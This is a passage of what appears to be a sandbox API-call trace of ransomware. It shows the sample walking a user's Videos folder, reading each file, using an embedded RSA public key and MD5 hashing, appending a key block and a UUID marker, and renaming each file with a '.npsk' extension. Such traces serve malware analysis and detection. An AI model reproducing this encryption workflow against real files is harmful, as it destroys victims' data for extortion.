ftCreationTime.dwHighDateTime=0x1d5e056, ftLastAccessTime.dwLowDateTime=0xff8f26d0, ftLastAccessTime.dwHighDateTime=0x1d5de96, ftLastWriteTime.dwLowDateTime=0xff8f26d0, ftLastWriteTime.dwHighDateTime=0x1d5de96, nFileSizeHigh=0x0, nFileSizeLow=0x81e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aOKAjfXUh6dwJIzj_.mp4", cAlternateFileName="AOKAJF~1.MP4")) returned 1 [0215.970] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aOKAjfXUh6dwJIzj_.mp4") returned=".mp4" [0215.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aOKAjfXUh6dwJIzj_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aokajfxuh6dwjizj_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.970] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=33251) returned 1 [0215.970] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.972] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x81bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.972] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.976] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x81e3, lpOverlapped=0x0) returned 1 [0215.977] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.977] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.977] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.977] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.978] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.978] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.978] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.978] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.978] GetLastError () returned 0x0 [0215.978] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.978] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.978] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.978] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.978] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.979] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.979] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x81e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.979] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.979] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.979] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.980] CloseHandle (hObject=0x61c) returned 1 [0215.981] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aOKAjfXUh6dwJIzj_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aokajfxuh6dwjizj_.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aOKAjfXUh6dwJIzj_.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aokajfxuh6dwjizj_.mp4.npsk")) returned 1 [0215.983] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffc715f0, ftCreationTime.dwHighDateTime=0x1d5e6c9, ftLastAccessTime.dwLowDateTime=0x14b936a0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x14b936a0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0xb8e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aTYRVsT4Wq FMYn5BKDv.avi", cAlternateFileName="ATYRVS~1.AVI")) returned 1 [0215.983] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aTYRVsT4Wq FMYn5BKDv.avi") returned=".avi" [0215.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aTYRVsT4Wq FMYn5BKDv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\atyrvst4wq fmyn5bkdv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.984] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=47337) returned 1 [0215.984] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.986] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb8c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.986] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.988] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb8e9, lpOverlapped=0x0) returned 1 [0215.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.989] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.990] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.990] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.990] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.991] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.991] GetLastError () returned 0x0 [0215.991] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.991] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.991] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.991] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.991] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.991] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.992] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb8e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.992] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.992] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.992] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.992] CloseHandle (hObject=0x61c) returned 1 [0215.995] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aTYRVsT4Wq FMYn5BKDv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\atyrvst4wq fmyn5bkdv.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aTYRVsT4Wq FMYn5BKDv.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\atyrvst4wq fmyn5bkdv.avi.npsk")) returned 1 [0215.997] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f57bb0, ftCreationTime.dwHighDateTime=0x1d5dcca, ftLastAccessTime.dwLowDateTime=0xb0c0ce10, ftLastAccessTime.dwHighDateTime=0x1d5e42b, ftLastWriteTime.dwLowDateTime=0xb0c0ce10, ftLastWriteTime.dwHighDateTime=0x1d5e42b, nFileSizeHigh=0x0, nFileSizeLow=0x187d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B1-w-MfFYfDz.avi", cAlternateFileName="B1-W-M~1.AVI")) returned 1 [0215.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B1-w-MfFYfDz.avi") returned=".avi" [0215.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B1-w-MfFYfDz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b1-w-mffyfdz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.997] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=100309) returned 1 [0215.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.999] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x187af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.999] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.001] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x187d5, lpOverlapped=0x0) returned 1 [0216.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.002] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.003] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.004] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.004] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.004] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.004] GetLastError () returned 0x0 [0216.004] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.004] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.004] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.004] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.004] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.005] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.005] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x187d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.005] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.006] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.006] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.006] CloseHandle (hObject=0x61c) returned 1 [0216.008] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B1-w-MfFYfDz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b1-w-mffyfdz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B1-w-MfFYfDz.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b1-w-mffyfdz.avi.npsk")) returned 1 [0216.009] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf24930, ftCreationTime.dwHighDateTime=0x1d5df8e, ftLastAccessTime.dwLowDateTime=0x1b335ef0, ftLastAccessTime.dwHighDateTime=0x1d5e7c6, ftLastWriteTime.dwLowDateTime=0x1b335ef0, ftLastWriteTime.dwHighDateTime=0x1d5e7c6, nFileSizeHigh=0x0, nFileSizeLow=0x81df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BGVUfXjkkn.mp4", cAlternateFileName="BGVUFX~1.MP4")) returned 1 [0216.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BGVUfXjkkn.mp4") returned=".mp4" [0216.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BGVUfXjkkn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bgvufxjkkn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.010] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=33247) returned 1 [0216.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.012] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x81b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.012] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.014] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x81df, lpOverlapped=0x0) returned 1 [0216.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.015] 